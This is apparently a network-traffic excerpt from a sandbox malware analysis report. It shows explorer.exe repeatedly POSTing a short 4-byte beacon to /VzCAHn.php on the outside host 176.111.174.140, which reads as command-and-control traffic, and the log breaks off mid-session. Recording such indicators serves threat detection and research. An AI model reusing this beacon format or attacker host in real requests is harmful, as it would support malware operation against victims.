                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  29192.168.2.449808176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:20.897423983 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:21.017764091 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:22.570342064 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:21 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  30192.168.2.449814176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:22.801644087 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:22.922791958 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:24.503727913 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:23 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  31192.168.2.449816176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:24.737725019 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:24.857738972 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:26.237664938 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:25 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  32192.168.2.449821176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:26.470963001 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:26.595968962 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:29.207603931 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:26 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  33192.168.2.449831176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:29.441523075 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:29.561475039 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:31.192925930 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:29 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  34192.168.2.449834176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:31.425955057 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:31.547076941 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:33.001332998 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:31 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  35192.168.2.449840176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:33.238378048 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:33.359188080 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:34.749495029 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:33 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  36192.168.2.449845176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:34.992321014 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:35.112189054 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:36.921938896 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:35 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  37192.168.2.449851176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:37.159656048 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:37.280957937 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:38.785279036 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:37 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  38192.168.2.449853176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:39.018080950 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:39.224689960 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:40.462173939 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:39 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  39192.168.2.449859176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:41.126848936 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:41.249105930 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:42.898632050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:41 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  40192.168.2.449864176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:43.130089045 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:43.252727985 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:44.634018898 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:43 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  41192.168.2.449866176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:44.890474081 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:45.015813112 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:46.399543047 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:45 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  42192.168.2.449872176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:46.629436016 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:46.749413967 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:48.403049946 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:47 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  43192.168.2.449878176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:48.627167940 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:48.747145891 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:50.367989063 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:49 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  44192.168.2.449879176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:50.601080894 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:50.725898027 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:52.104212046 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:51 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  45192.168.2.449885176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:52.332524061 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:52.453711987 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:53.785005093 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:52 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  46192.168.2.449891176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.212738991 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:54.339895010 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.669276953 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:54 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  47192.168.2.449892176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:55.916146994 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:56.039875984 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.464867115 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:56 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  48192.168.2.449898176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.699301958 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
